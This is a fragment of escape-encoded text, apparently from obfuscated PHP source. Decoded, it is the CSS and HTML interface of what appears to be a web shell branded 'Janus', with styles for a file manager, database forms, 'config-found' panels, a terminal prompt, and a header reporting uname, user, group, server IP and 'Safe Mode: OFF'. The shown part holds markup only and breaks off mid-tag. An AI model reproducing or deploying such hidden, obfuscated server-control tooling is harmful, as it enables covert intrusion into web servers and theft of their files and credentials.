1\x72\x28\55\55\x61\x63\x63\x65\156\164\x2d\142\154\165\x65\x29\x3b\x20\175\xa\x9\x9\56\156\157\x74\x69\x66\151\x63\x61\164\x69\157\156\55\151\164\x65\155\56\163\x75\x63\x63\145\163\x73\x20\173\40\142\157\162\144\x65\162\x2d\x6c\145\146\164\x3a\x20\63\x70\170\40\163\x6f\154\x69\x64\40\x76\x61\162\x28\x2d\55\x61\x63\143\145\x6e\164\x2d\x67\162\x65\145\156\x29\73\40\x7d\12\11\x9\56\x6e\x6f\x74\x69\x66\x69\143\141\x74\151\x6f\156\55\151\164\145\155\x2e\167\x61\x72\x6e\x69\x6e\147\40\173\40\x62\157\x72\x64\145\x72\x2d\x6c\x65\x66\x74\x3a\40\63\x70\x78\40\x73\x6f\x6c\151\144\40\x76\x61\162\x28\55\x2d\x61\x63\143\145\156\164\55\x67\157\154\x64\51\73\x20\175\xa\11\x9\x2e\156\157\164\x69\146\x69\x63\141\x74\151\157\156\x2d\151\164\145\x6d\56\145\x72\162\157\x72\40\173\40\x62\x6f\162\144\x65\x72\55\x6c\145\x66\x74\x3a\40\x33\160\170\x20\x73\157\154\151\144\x20\166\141\x72\50\55\55\x61\x63\x63\x65\x6e\164\x2d\162\x65\144\51\73\40\x7d\12\x9\x9\56\x6e\157\164\151\146\x69\x63\x61\x74\151\157\x6e\x2d\143\x6f\156\164\145\x6e\164\40\x7b\x20\x66\x6c\x65\170\72\x20\x31\x3b\40\175\xa\11\x9\x2e\156\x6f\x74\151\x66\151\143\x61\x74\x69\157\x6e\x2d\x74\x69\x74\x6c\145\40\173\40\x66\x6f\156\164\55\x77\145\151\x67\150\x74\x3a\x20\65\60\x30\x3b\x20\x6d\x61\x72\147\151\x6e\x2d\x62\157\x74\164\x6f\x6d\72\x20\x34\160\x78\73\x20\175\xa\x9\11\x2e\x6e\157\x74\151\146\151\x63\x61\164\151\x6f\x6e\x2d\155\x65\x73\x73\141\147\x65\x20\173\x20\143\157\x6c\157\162\72\40\166\141\162\50\x2d\x2d\x74\x65\170\x74\x2d\155\x65\144\51\x3b\x20\146\x6f\156\164\x2d\163\151\172\x65\x3a\x20\60\56\71\x72\145\155\73\40\x7d\xa\11\11\x2e\156\157\x74\x69\x66\151\x63\141\x74\x69\x6f\156\55\x74\x69\155\145\40\173\x20\143\157\x6c\157\162\72\40\166\141\162\50\x2d\x2d\164\145\170\164\x2d\155\145\144\51\x3b\40\146\x6f\x6e\164\x2d\x73\151\172\x65\x3a\x20\60\x2e\70\162\x65\155\x3b\x20\175\xa\x9\11\x2e\156\x6f\164\151\x66\x69\x63\x61\x74\151\157\x6e\x2d\143\154\157\163\145\40\173\40\143\165\x72\163\x6f\x72\x3a\40\160\x6f\151\156\x74\x65\x72\73\40\143\x6f\154\x6f\162\x3a\40\x76\x61\x72\x28\55\55\x74\x65\x78\x74\55\155\x65\144\51\73\40\x66\x6f\156\x74\55\x73\x69\172\x65\72\x20\x31\56\x32\x72\x65\155\x3b\x20\154\x69\x6e\x65\55\150\x65\151\147\150\164\72\40\x31\x3b\40\175\xa\11\x9\x2e\156\157\x74\x69\x66\x69\x63\x61\x74\151\157\x6e\55\x63\154\157\163\145\x3a\x68\157\x76\145\x72\40\x7b\40\x63\x6f\154\x6f\x72\x3a\40\166\x61\x72\x28\55\x2d\141\143\x63\x65\156\164\55\162\x65\144\x29\x3b\x20\175\xa\x20\x9\x9\x2e\x64\151\162\x2d\x74\x72\x65\x65\x20\165\154\x20\x7b\40\x6c\151\x73\164\x2d\x73\x74\x79\x6c\145\x3a\40\x6e\x6f\156\145\x3b\x20\x70\x61\144\144\151\156\x67\x2d\154\145\x66\x74\x3a\x20\62\60\160\170\73\40\175\40\x2e\144\151\x72\x2d\164\162\x65\x65\40\154\x69\40\x7b\x20\160\141\x64\x64\x69\x6e\x67\72\x20\x34\x70\x78\40\60\73\40\x7d\x20\56\144\x69\162\x2d\x74\x72\x65\145\x20\x6c\141\142\x65\154\x20\x7b\40\x64\151\x73\x70\154\x61\x79\x3a\40\146\x6c\145\x78\73\x20\x61\154\151\x67\x6e\55\151\x74\x65\155\x73\72\x20\x63\x65\156\x74\x65\162\73\x20\x7d\x20\56\x64\x69\162\x2d\x74\162\145\x65\55\x6e\x6f\x64\x65\40\x7b\40\143\x75\162\163\x6f\162\x3a\x20\160\157\151\156\x74\x65\162\x3b\x20\165\x73\145\x72\x2d\163\145\x6c\x65\143\164\72\x20\156\x6f\x6e\x65\73\x20\175\12\x20\11\11\56\144\x69\162\55\x74\162\x65\145\x2d\x6e\157\144\145\72\72\142\145\x66\157\x72\145\40\x7b\x20\143\x6f\x6e\x74\x65\156\164\x3a\40\47\360\x9f\223\x81\x27\x3b\40\x6d\141\162\147\x69\x6e\55\162\x69\x67\x68\x74\x3a\40\70\x70\170\x3b\x20\175\x20\56\x64\151\162\55\x74\x72\145\x65\x2d\156\157\144\x65\56\x63\157\x6c\x6c\x61\x70\163\145\144\72\72\142\145\x66\157\x72\145\40\x7b\x20\143\157\156\164\x65\156\164\72\x20\47\xf0\237\223\202\x27\73\40\175\40\56\x64\151\162\55\164\x72\145\x65\40\x69\156\x70\165\164\x5b\164\x79\x70\145\75\x22\143\150\145\x63\153\142\x6f\170\x22\135\40\x7b\x20\x6d\x61\162\x67\x69\x6e\55\x72\x69\147\150\x74\x3a\x20\70\160\x78\73\40\164\162\141\156\163\146\x6f\x72\x6d\x3a\x20\x73\x63\141\x6c\x65\x28\x31\x2e\61\51\x3b\40\175\xa\x20\11\x9\x2e\144\x62\55\146\x6f\x72\155\55\x67\162\151\144\x20\173\x20\144\151\x73\x70\154\x61\x79\72\x20\147\x72\151\x64\x3b\x20\x67\x72\151\x64\55\x74\x65\155\160\154\141\x74\145\55\x63\157\x6c\165\x6d\156\163\72\x20\x72\x65\x70\x65\141\x74\x28\x61\165\x74\x6f\55\146\x69\164\x2c\40\x6d\151\x6e\x6d\141\170\50\x32\x30\60\160\170\54\x20\61\x66\x72\51\x29\73\x20\x67\x61\x70\72\x20\x31\162\145\x6d\73\x20\x6d\141\x72\147\x69\x6e\x2d\142\x6f\x74\164\x6f\x6d\72\x20\x31\x2e\65\162\x65\155\x3b\40\x7d\xa\x20\11\11\56\164\x61\142\x73\x20\x7b\x20\144\x69\x73\160\x6c\x61\x79\72\40\146\154\x65\x78\73\x20\142\157\x72\144\x65\162\55\142\x6f\164\x74\157\155\x3a\x20\61\160\170\40\163\x6f\x6c\151\x64\x20\166\141\162\x28\55\55\x62\x6f\162\144\x65\x72\x2d\x63\157\x6c\x6f\162\51\73\x20\x6d\x61\162\x67\151\156\55\142\x6f\164\164\157\155\72\40\x31\56\65\162\x65\x6d\73\40\x7d\12\x20\11\11\56\x74\x61\142\x2d\x6c\151\156\153\x20\x7b\x20\160\141\144\x64\x69\156\x67\x3a\x20\x31\60\160\170\x20\x32\x30\x70\x78\x3b\40\143\x75\x72\163\x6f\162\72\40\x70\x6f\151\x6e\x74\145\x72\73\x20\x62\x6f\x72\144\x65\x72\55\x62\157\164\x74\x6f\x6d\72\40\x32\x70\x78\x20\x73\157\154\x69\144\x20\164\x72\x61\x6e\163\x70\x61\162\x65\x6e\x74\73\x20\164\162\x61\156\163\151\x74\151\157\156\72\x20\141\x6c\154\x20\60\56\x32\x73\x3b\x20\175\12\x20\11\11\x2e\164\141\142\55\154\151\156\153\56\x61\143\164\x69\166\145\x20\x7b\x20\x63\x6f\154\157\162\72\x20\166\x61\162\x28\55\55\x61\143\x63\145\x6e\164\x2d\x62\154\165\x65\x29\x3b\x20\x62\157\x72\144\145\162\x2d\142\157\164\164\157\155\55\143\x6f\x6c\157\162\x3a\x20\x76\x61\x72\x28\55\55\141\143\143\145\156\164\x2d\142\x6c\165\145\x29\x3b\40\175\12\x20\x9\11\x2e\x74\x61\x62\x2d\143\157\x6e\x74\145\x6e\164\40\173\x20\x64\151\163\x70\x6c\x61\171\72\x20\156\157\156\x65\73\x20\175\xa\40\x9\11\x2e\164\x61\142\x2d\143\x6f\156\164\145\156\x74\56\141\143\x74\x69\166\x65\x20\173\x20\x64\151\x73\x70\154\x61\171\x3a\x20\142\154\157\x63\153\73\40\175\12\x20\11\11\150\x72\x20\x7b\40\x62\x6f\162\144\x65\162\55\x63\x6f\154\x6f\x72\x3a\x20\166\x61\162\50\x2d\55\x62\x6f\162\144\x65\x72\x2d\x63\x6f\154\157\x72\51\73\40\155\x61\162\x67\151\156\72\x20\62\x72\145\155\x20\x30\x3b\40\142\157\x72\144\x65\162\x2d\163\164\x79\x6c\x65\x3a\x20\x73\157\x6c\151\144\x3b\40\x62\x6f\x72\144\x65\x72\55\x77\x69\144\x74\x68\72\x20\61\160\170\x20\x30\x20\x30\40\60\x3b\x20\x7d\12\40\x9\x9\56\143\157\156\x66\x69\147\55\146\x6f\x75\156\x64\40\173\40\x62\157\x72\144\x65\x72\72\40\61\x70\x78\40\163\157\x6c\151\x64\x20\x76\x61\162\x28\55\55\x62\157\x72\x64\145\x72\55\x63\x6f\154\157\x72\51\73\40\142\x6f\162\144\x65\162\55\162\141\144\151\x75\x73\x3a\x20\x36\x70\170\x3b\x20\x6d\x61\x72\x67\151\156\x2d\142\x6f\x74\164\157\x6d\72\40\61\162\x65\x6d\x3b\40\175\12\40\11\11\56\x63\x6f\x6e\146\x69\147\55\146\157\165\x6e\x64\55\150\x65\141\144\145\x72\40\x7b\40\x62\x61\x63\x6b\147\x72\157\x75\x6e\144\72\x20\x76\141\162\x28\x2d\55\142\x67\55\x6c\x69\147\x68\x74\51\73\x20\160\x61\144\x64\x69\x6e\147\72\40\x38\160\x78\x20\61\62\160\x78\73\x20\x66\157\156\164\x2d\167\x65\151\147\150\x74\x3a\x20\x35\60\x30\73\x20\x63\157\154\x6f\x72\72\x20\166\141\x72\x28\55\x2d\x61\143\143\145\x6e\164\x2d\147\x72\x65\x65\156\x29\73\x20\175\12\x20\11\11\56\x63\x6f\x6e\x66\151\147\x2d\x66\157\165\x6e\x64\55\142\157\144\x79\40\173\40\x70\141\144\x64\x69\156\147\72\40\61\x32\x70\170\x3b\40\x77\x68\x69\164\145\55\x73\x70\x61\143\x65\72\40\x70\x72\x65\x2d\167\162\141\160\73\x20\x77\x6f\x72\144\x2d\142\x72\x65\x61\x6b\72\40\142\162\x65\x61\x6b\55\141\x6c\x6c\x3b\x20\x6d\141\x78\x2d\150\145\151\147\150\164\72\x20\63\x30\60\160\x78\x3b\40\157\x76\145\162\x66\154\157\167\x2d\171\72\x20\141\165\x74\157\73\40\175\xa\40\11\11\56\164\x6f\x6f\x6c\x2d\x69\156\160\x75\164\x2d\x67\162\157\165\x70\x20\x7b\40\x64\x69\x73\160\154\141\171\72\x20\x67\x72\x69\x64\x3b\40\147\x72\151\144\55\x74\x65\x6d\x70\x6c\141\x74\145\x2d\143\157\154\165\x6d\156\163\x3a\40\61\146\x72\x3b\x20\147\141\160\x3a\x20\60\56\70\x72\x65\x6d\73\x20\x6d\141\x72\x67\x69\156\55\x62\x6f\164\x74\x6f\155\72\40\61\162\x65\x6d\73\40\x7d\12\40\x9\x9\100\x6d\145\144\x69\141\40\50\155\x69\x6e\55\x77\151\x64\x74\x68\72\40\x36\x30\x30\x70\170\51\40\173\x20\x2e\x74\157\x6f\154\55\151\156\160\165\164\55\147\162\x6f\165\x70\x20\173\40\147\162\x69\x64\x2d\164\x65\x6d\160\154\141\164\145\x2d\x63\157\154\x75\x6d\156\163\x3a\x20\162\x65\x70\145\x61\x74\x28\x61\165\164\157\55\146\x69\x74\54\x20\x6d\x69\156\155\x61\x78\50\x32\60\x30\160\x78\x2c\40\61\x66\162\51\51\73\40\175\x20\175\12\xa\xa\11\11\57\52\x20\55\x2d\55\x20\115\157\x62\151\x6c\x65\40\x52\x65\x73\x70\x6f\156\163\x69\166\145\x20\x2d\x2d\x2d\40\52\x2f\12\11\11\100\155\x65\144\151\x61\40\50\155\141\170\55\x77\x69\144\164\150\72\40\x37\66\70\160\x78\51\40\x7b\xa\11\11\x9\x62\157\144\171\40\x7b\x20\146\157\156\164\55\163\151\x7a\145\72\40\x31\x33\x70\170\73\40\x2d\x77\x65\x62\153\x69\164\55\164\145\170\164\55\x73\x69\x7a\145\x2d\x61\x64\x6a\165\163\164\72\40\61\x30\x30\x25\x3b\40\175\12\x9\x9\x9\56\150\x65\141\x64\x65\162\55\x63\x6f\154\x6c\141\160\163\145\x2d\x62\x74\x6e\x20\x7b\x20\144\x69\163\x70\154\x61\171\72\40\x62\154\x6f\143\x6b\x20\x21\151\155\160\157\162\x74\x61\x6e\164\x3b\x20\x76\151\163\x69\142\151\154\151\164\171\x3a\40\x76\x69\x73\x69\142\154\x65\40\x21\x69\155\160\x6f\162\164\x61\156\x74\73\x20\157\160\x61\x63\151\x74\171\72\x20\61\x20\x21\x69\155\x70\157\162\164\x61\156\x74\x3b\40\x7d\xa\x9\11\x9\56\x73\171\x73\x74\145\155\55\x69\156\146\157\55\150\145\141\x64\145\x72\x2d\143\x6f\156\164\x65\156\164\x20\x7b\40\146\154\145\x78\x2d\144\x69\x72\x65\x63\x74\x69\x6f\156\x3a\40\x63\x6f\x6c\x75\155\x6e\x3b\40\x7d\xa\11\x9\x9\x2e\163\x79\x73\x74\x65\x6d\x2d\x69\156\146\x6f\55\150\x65\141\x64\x65\x72\56\143\157\x6c\x6c\141\160\x73\x65\x64\x20\x2e\x73\x79\163\x74\145\x6d\55\151\x6e\146\157\55\150\145\x61\x64\x65\162\55\x63\x6f\156\x74\145\x6e\164\40\173\x20\144\151\x73\160\x6c\x61\171\72\x20\x6e\x6f\156\x65\40\x21\151\x6d\x70\x6f\162\x74\x61\156\x74\73\40\x76\151\163\x69\142\151\154\x69\x74\x79\x3a\40\x68\x69\x64\144\x65\156\x20\41\151\155\x70\x6f\162\164\x61\x6e\164\73\x20\175\xa\11\11\11\56\163\171\x73\164\145\155\55\151\x6e\x66\157\55\150\x65\141\144\145\162\56\143\x6f\154\x6c\141\x70\x73\x65\144\40\x7b\40\160\x61\144\144\151\156\147\x3a\x20\x30\x2e\65\x72\x65\155\x20\x31\162\145\x6d\73\x20\x6d\x69\156\55\x68\x65\x69\x67\x68\164\x3a\x20\x35\60\x70\170\73\40\x70\157\163\x69\164\151\x6f\x6e\x3a\x20\x72\x65\154\x61\164\x69\166\145\73\40\175\xa\x9\x9\x9\56\x73\171\163\x74\x65\x6d\55\x69\156\146\157\x2d\150\x65\x61\x64\x65\162\56\143\157\x6c\x6c\x61\x70\163\145\x64\40\x2e\150\145\x61\144\x65\x72\55\143\157\154\154\x61\160\x73\x65\x2d\142\164\156\x20\173\x20\12\11\x9\11\11\x64\x69\163\x70\154\141\171\72\40\142\x6c\157\x63\153\40\41\x69\155\x70\157\x72\x74\141\156\164\x3b\40\xa\11\11\x9\11\166\x69\163\x69\x62\x69\154\x69\x74\x79\x3a\40\x76\x69\163\151\142\x6c\x65\40\x21\151\x6d\x70\157\x72\x74\141\x6e\x74\x3b\x20\12\x9\11\11\11\x6f\160\141\x63\x69\164\x79\72\40\x31\40\41\x69\x6d\160\157\162\x74\x61\156\164\73\xa\x9\x9\x9\x9\x70\x6f\x73\151\164\x69\x6f\x6e\x3a\x20\x61\142\163\x6f\x6c\165\x74\145\40\41\151\155\160\x6f\x72\x74\141\156\x74\73\40\xa\x9\11\x9\11\x74\x6f\x70\72\x20\60\56\63\162\145\x6d\x20\41\x69\x6d\x70\157\x72\164\x61\x6e\x74\73\x20\12\x9\x9\11\11\x72\x69\147\x68\x74\72\x20\60\x2e\65\162\145\x6d\x20\x21\151\155\x70\x6f\x72\164\141\156\x74\73\x20\12\x9\11\x9\11\x6d\x61\x72\x67\151\156\x3a\40\x30\x20\x21\x69\155\160\x6f\162\x74\x61\156\x74\73\x20\xa\x9\11\x9\x9\172\x2d\x69\x6e\144\x65\x78\72\x20\61\60\60\60\x20\x21\151\155\160\157\162\164\x61\x6e\x74\73\12\x9\x9\x9\x9\160\x6f\x69\x6e\x74\x65\x72\55\x65\166\x65\x6e\164\x73\72\40\x61\x75\x74\x6f\40\41\x69\x6d\x70\x6f\162\x74\x61\156\164\x3b\12\x9\x9\11\175\xa\x9\11\x9\x2e\163\x79\x73\55\x69\x6e\x66\x6f\x2d\154\x65\146\x74\x20\x7b\40\x67\162\x69\144\x2d\164\x65\x6d\x70\154\x61\x74\x65\55\x63\x6f\x6c\x75\x6d\x6e\163\x3a\x20\61\146\162\73\x20\147\141\x70\72\40\60\x2e\x33\162\x65\x6d\73\40\146\157\x6e\164\55\x73\151\172\x65\72\x20\x30\56\70\162\145\x6d\x3b\40\x7d\12\x9\x9\11\x2e\x73\x79\x73\x2d\x69\x6e\146\157\x2d\162\x69\147\150\x74\x20\x7b\x20\164\145\170\x74\55\141\154\151\x67\x6e\72\40\154\145\146\x74\73\x20\x77\151\144\164\x68\x3a\x20\61\60\x30\45\x3b\x20\x7d\12\x9\11\x9\x2e\152\x61\x6e\165\163\55\x6c\x6f\147\x6f\x2d\x63\x6f\156\x74\x61\151\x6e\x65\x72\40\x7b\40\x61\154\151\x67\156\55\x69\x74\x65\x6d\163\72\40\146\154\x65\170\x2d\163\x74\x61\x72\164\x3b\x20\175\xa\x9\11\11\56\152\x61\156\165\163\55\x6c\x6f\147\x6f\x20\x7b\40\x66\157\156\x74\55\x73\x69\x7a\x65\x3a\40\x39\x70\x78\73\40\175\xa\11\11\x9\56\152\x61\x6e\165\163\55\x76\145\x72\x73\x69\x6f\156\40\173\40\x66\x6f\x6e\164\x2d\x73\x69\x7a\145\72\x20\60\56\x39\162\145\x6d\73\40\175\12\x9\x9\x9\56\156\141\x76\55\143\x6f\x6c\x6c\x61\160\163\x65\55\142\x74\x6e\x20\x7b\x20\x64\x69\x73\160\154\x61\x79\72\40\142\x6c\x6f\x63\x6b\x3b\40\x7d\12\x9\x9\x9\56\x6e\141\x76\55\x62\165\164\x74\157\156\x73\x2d\x63\x6f\156\x74\x61\x69\156\x65\162\x20\173\40\144\x69\163\160\x6c\x61\x79\x3a\40\156\x6f\156\x65\x3b\x20\146\154\145\x78\x2d\x64\x69\162\x65\143\x74\151\157\156\72\40\x63\x6f\154\x75\x6d\x6e\73\40\147\141\160\72\40\60\x2e\x34\x72\x65\x6d\x3b\x20\x6d\x61\170\55\150\x65\x69\147\x68\x74\72\x20\x30\73\x20\157\x76\x65\x72\146\x6c\x6f\x77\x3a\40\x68\x69\x64\x64\x65\x6e\x3b\40\x74\162\141\156\163\x69\164\151\157\x6e\72\x20\155\x61\x78\x2d\150\145\x69\x67\150\x74\40\60\56\63\163\40\145\141\163\x65\55\x6f\x75\164\73\40\x7d\12\11\x9\11\x2e\x74\157\x70\x2d\x6e\x61\166\142\141\x72\56\145\170\160\x61\x6e\144\x65\144\x20\x2e\x6e\x61\166\55\142\165\x74\x74\157\156\x73\55\x63\x6f\x6e\164\x61\x69\156\145\x72\40\173\x20\x64\x69\163\160\154\x61\171\72\40\x66\x6c\145\x78\x3b\40\x6d\141\170\55\x68\145\x69\x67\x68\x74\x3a\40\70\60\166\150\x3b\x20\x6f\166\145\162\146\x6c\157\x77\55\x79\x3a\40\141\x75\164\x6f\73\40\175\12\x9\x9\11\56\164\x6f\160\55\156\x61\x76\x62\141\x72\40\173\x20\x70\141\144\144\x69\156\147\72\x20\x30\x2e\64\162\x65\x6d\x20\60\x2e\x35\162\x65\155\73\x20\x7d\xa\x9\11\x9\56\x6e\x61\166\55\142\165\164\164\x6f\156\x20\x7b\40\x70\141\x64\144\x69\x6e\x67\x3a\40\x30\56\x35\162\x65\155\40\x30\x2e\x38\x72\x65\x6d\x3b\x20\146\x6f\156\x74\55\163\151\172\x65\72\x20\61\62\160\170\73\x20\x77\151\x64\164\150\72\40\x31\x30\60\45\73\x20\x6a\x75\163\x74\151\x66\x79\55\143\157\x6e\164\x65\x6e\164\72\40\143\145\156\164\145\x72\73\x20\x7d\12\x9\11\x9\x2e\143\x6f\x6e\x74\x65\x6e\x74\x2d\x61\162\145\x61\x20\173\x20\x70\x61\x64\x64\x69\156\x67\72\x20\x31\x72\x65\x6d\73\40\x7d\12\11\11\11\x2e\x63\x6f\156\164\145\x6e\x74\55\x68\145\141\144\x65\162\40\x7b\40\x66\157\156\x74\x2d\x73\151\x7a\145\x3a\x20\x31\56\x31\x72\x65\x6d\73\x20\175\12\x9\11\x9\56\155\x6f\x64\x61\x6c\55\x63\157\x6e\x74\x65\x6e\164\x20\173\x20\167\x69\x64\164\150\x3a\x20\x39\x35\x76\167\73\40\155\x61\x78\55\150\x65\151\x67\150\x74\72\x20\x39\x30\x76\x68\x3b\x20\175\xa\x9\11\x9\x2e\163\x79\163\55\x69\x6e\x66\157\55\x67\x72\151\x64\40\173\x20\x67\x72\x69\144\x2d\x74\145\x6d\160\x6c\x61\x74\145\55\x63\157\154\165\155\156\163\x3a\x20\61\x66\162\x3b\40\x67\x61\x70\72\40\x38\160\170\x20\x30\73\x20\175\xa\x9\11\x9\56\x73\171\163\x2d\151\156\x66\x6f\x2d\147\162\x69\x64\40\163\160\x61\x6e\72\x6e\164\150\x2d\143\x68\x69\x6c\x64\x28\157\x64\x64\x29\x20\x7b\x20\x74\x65\170\164\55\141\x6c\151\147\x6e\x3a\x20\x6c\x65\146\164\73\40\x66\157\156\x74\x2d\x73\x69\x7a\x65\72\40\60\x2e\x38\162\x65\155\x3b\x20\x63\157\154\157\x72\x3a\40\x76\141\x72\x28\55\x2d\164\145\x78\x74\55\x6d\x65\144\x29\73\x20\175\xa\x9\11\x9\56\163\x79\x73\55\151\x6e\x66\x6f\55\147\x72\151\144\40\163\x70\x61\156\x3a\x6e\x74\x68\55\x63\x68\151\x6c\x64\50\145\x76\145\156\x29\x20\173\x20\x70\141\144\x64\x69\156\147\55\154\145\146\164\x3a\x20\61\60\x70\170\73\40\175\12\11\x9\11\56\146\x69\x6c\x65\55\155\141\x6e\x61\147\x65\x72\x2d\143\157\156\164\x72\157\x6c\x73\x20\173\x20\x66\x6c\x65\x78\x2d\x64\x69\162\145\x63\164\151\157\x6e\x3a\40\x63\x6f\154\165\155\156\73\x20\147\141\x70\72\x20\61\60\x70\170\x3b\x20\141\154\x69\x67\x6e\55\x69\x74\x65\x6d\x73\x3a\x20\x73\164\x72\x65\x74\x63\150\73\x20\x7d\12\11\11\x9\56\146\151\x6c\x65\55\x6d\141\156\x61\x67\x65\x72\x2d\143\157\x6e\164\x72\157\x6c\x73\x20\x3e\x20\144\151\x76\x20\x7b\40\144\151\x73\x70\x6c\x61\x79\x3a\40\146\154\145\170\73\40\x66\154\x65\170\x2d\x77\162\x61\160\x3a\x20\x77\x72\x61\160\x3b\40\x67\141\x70\x3a\x20\70\160\170\x3b\x20\x6a\165\163\x74\x69\x66\171\55\143\x6f\156\x74\145\156\x74\x3a\x20\x63\145\x6e\x74\x65\x72\73\x20\175\xa\11\x9\x9\56\146\151\x6c\x65\x2d\155\141\x6e\x61\147\x65\162\x2c\40\x23\x64\142\x2d\x72\145\163\165\154\x74\x73\55\x63\157\x6e\164\x61\151\x6e\x65\162\40\x7b\40\157\166\145\162\146\154\x6f\167\x2d\170\x3a\40\x61\x75\x74\x6f\x3b\x20\175\xa\11\x9\x9\x2e\146\151\x6c\145\55\155\141\156\141\x67\145\x72\x20\164\x61\142\154\x65\x20\164\x64\x2c\40\x2e\x66\151\154\145\x2d\x6d\141\156\141\x67\145\162\40\164\141\142\x6c\x65\40\x74\150\40\173\x20\x70\x61\x64\x64\151\156\147\72\40\x31\x30\x70\170\x20\x31\62\160\x78\73\x20\175\12\x9\11\11\x2e\164\157\157\x6c\x2d\163\x65\143\x74\151\x6f\156\40\x3e\x20\x64\151\166\x20\173\40\x66\154\x65\170\x2d\x64\151\162\145\143\x74\151\x6f\x6e\x3a\x20\143\x6f\154\x75\x6d\x6e\73\40\x7d\xa\x9\x9\11\x2e\164\157\x6f\154\x2d\163\145\x63\164\151\157\156\x20\151\x6e\160\x75\x74\54\40\56\164\x6f\x6f\x6c\x2d\163\x65\x63\164\151\157\x6e\40\163\145\x6c\145\143\164\40\x7b\x20\x77\x69\144\x74\x68\72\40\x31\60\60\x25\x3b\x20\x6d\141\x72\147\x69\x6e\x2d\x72\x69\x67\150\164\72\40\x30\x20\x21\151\x6d\160\x6f\162\164\x61\x6e\164\x3b\x20\x7d\xa\x9\x9\11\x2e\x64\x62\55\x66\x6f\162\155\55\x67\x72\151\x64\x20\x7b\x20\x67\162\x69\144\55\x74\145\155\x70\x6c\141\x74\145\x2d\x63\x6f\154\165\x6d\x6e\x73\72\40\61\146\162\73\40\175\12\x9\11\11\x2e\x74\x65\162\155\x2d\160\162\x6f\155\160\164\x20\x7b\40\x66\154\145\x78\x2d\x77\x72\141\x70\72\40\x77\x72\x61\x70\73\x20\175\xa\11\11\175\xa\x9\x9\x2f\52\40\x2d\55\x2d\40\x45\156\x64\40\115\157\142\x69\x6c\145\40\55\x2d\x2d\40\52\x2f\xa\x20\11\x3c\x2f\163\164\171\154\x65\76\xa\x20\x3c\57\150\145\141\144\x3e\12\40\x3c\x62\157\144\x79\76\xa\x9\x3c\144\151\166\40\143\154\141\163\163\x3d\x22\x73\x79\x73\x74\x65\x6d\55\151\x6e\x66\x6f\x2d\x68\x65\141\144\x65\162\42\40\151\144\x3d\x22\163\171\x73\x74\145\155\x2d\x69\x6e\x66\x6f\x2d\150\x65\x61\x64\145\162\42\76\xa\x9\x9\x3c\x62\x75\164\x74\x6f\156\40\143\154\141\163\163\75\42\150\145\x61\x64\x65\162\x2d\143\157\x6c\x6c\x61\x70\163\x65\x2d\x62\164\x6e\x22\40\151\144\75\x22\150\x65\x61\x64\x65\162\x2d\143\x6f\x6c\154\141\x70\163\145\55\142\x74\156\x22\40\x74\x69\x74\x6c\x65\x3d\42\124\157\147\x67\x6c\145\40\x53\x79\163\x74\145\155\40\111\156\146\x6f\42\76\342\x98\260\74\57\x62\x75\x74\164\x6f\x6e\76\12\x9\x9\74\144\x69\166\x20\x63\154\x61\163\x73\x3d\42\x73\171\x73\164\145\x6d\55\x69\x6e\x66\x6f\x2d\x68\145\141\x64\x65\x72\55\x63\x6f\156\x74\x65\156\x74\x22\76\12\11\x9\x9\x3c\x64\151\x76\40\x63\154\x61\x73\x73\x3d\x22\163\x79\x73\55\151\x6e\146\x6f\55\154\x65\146\x74\x22\76\xa\x9\x9\x9\74\x64\x69\x76\x20\x63\x6c\141\x73\x73\x3d\42\163\171\163\55\151\x6e\146\157\55\x69\x74\145\155\42\76\x3c\x73\x74\162\x6f\x6e\x67\76\125\156\141\155\145\72\x3c\x2f\x73\164\x72\x6f\x6e\x67\76\40\x3c\163\160\x61\156\x20\x69\x64\x3d\x22\163\171\163\55\x75\156\x61\155\x65\42\x3e\x2d\x2d\74\57\163\160\x61\156\76\x3c\57\144\x69\x76\x3e\12\11\x9\11\74\x64\x69\x76\x20\x63\x6c\141\163\x73\x3d\x22\x73\171\x73\x2d\151\x6e\x66\157\x2d\151\164\145\155\42\76\x3c\163\x74\162\157\x6e\x67\x3e\125\x73\x65\x72\72\74\57\163\x74\162\157\x6e\147\76\40\74\x73\x70\141\x6e\x20\151\144\75\x22\163\x79\163\55\165\163\x65\x72\42\76\55\x2d\x3c\x2f\163\x70\x61\x6e\x3e\40\74\x73\164\162\157\x6e\x67\x3e\x47\162\157\x75\160\72\x3c\x2f\x73\x74\162\x6f\x6e\147\76\x20\x3c\163\x70\141\156\40\151\144\75\x22\x73\171\163\55\x67\x72\157\x75\160\42\x3e\x2d\x2d\x3c\57\163\x70\x61\x6e\x3e\x3c\57\x64\x69\x76\76\12\11\11\x9\x3c\x64\x69\x76\40\143\x6c\141\163\163\75\42\163\171\163\55\x69\156\x66\157\55\x69\x74\x65\x6d\42\x3e\x3c\x73\164\x72\157\x6e\x67\76\120\x48\120\x3a\x3c\57\x73\164\x72\x6f\x6e\x67\x3e\40\74\163\160\141\156\40\x69\x64\75\42\x73\x79\163\x2d\160\x68\x70\55\x73\141\146\145\x22\40\x73\164\171\154\145\x3d\x22\143\157\x6c\x6f\162\72\166\141\x72\50\x2d\x2d\x61\x63\143\x65\156\164\x2d\x67\162\145\145\x6e\x29\x3b\x22\x3e\x53\141\146\x65\x20\x4d\x6f\x64\x65\x3a\40\x4f\106\106\74\x2f\x73\160\x61\156\x3e\x3c\x2f\144\x69\166\76\xa\11\11\11\x3c\x64\151\166\40\x63\x6c\x61\163\x73\75\42\163\x79\x73\55\151\156\146\x6f\55\151\x74\145\x6d\42\x3e\74\163\x74\162\157\x6e\x67\76\x53\145\x72\x76\145\x72\x49\120\x3a\x3c\x2f\163\164\162\157\x6e\147\76\x20\x3c\163\160\141\x6e\x20\151\x64\x3d\x22\163\x79\x73\x2d\x73\x65\162\x76\x65\x72\x69\x70\x22\x3e\x2d\x2d\x3c\x2f\163\160\x61\x6e\x3e\74\57\144\x69\166\x3e\xa\11\11\x9\x3c\x64\x69\166\x20\143\154\141\x73\163\x3d\x22\x73\171\163\55\x69\156\x66\157\55\151\164\x65\155\x22\x3e\74\x73\164\162\157\x6e\x67\76\x44\x61\164\x65\124\x69\155\x65\x3a\x3c\57\x73\x74\162\x6f\156\x67\76\x20\74\163\160\x61\x6e\x20\x69\144\75\x22\x73\171\x73\x2d\x64\141\164\x65\164\151\x6d\145\x22\x3e\55\x2d\74\x2f\x73\160\141\x6e\x3e\74\x2f\144\151\166\76\12\11\x9\11\x3c\x64\151\x76\x20\x63\154\141\163\163\75\x22\163\171\163\55\x69\x6e\x66\x6f\55\x69\x74\x65\155\42\x3e\74\x73\164\162\157\156\x67\76\110\104\x44\72\x3c\x2f\x73\164\x72\157\156\147\x3e\x20\74\163\x70\141\x6e\40\x69\x64\75\x22\x73\x79